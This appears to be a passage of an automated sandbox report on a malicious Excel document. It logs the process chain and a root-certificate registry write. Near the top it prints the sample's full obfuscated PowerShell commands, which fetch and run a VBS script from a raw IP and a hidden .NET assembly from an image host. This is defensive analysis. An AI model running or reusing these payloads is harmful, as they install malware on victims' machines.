hbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispiculeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899C022D push eax; iretd 7_2_000007FE899C0241
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899C00BD pushad ; iretd 7_2_000007FE899C00C1

        Persistence and Installation Behavior

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\5djzgayy\5djzgayy.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
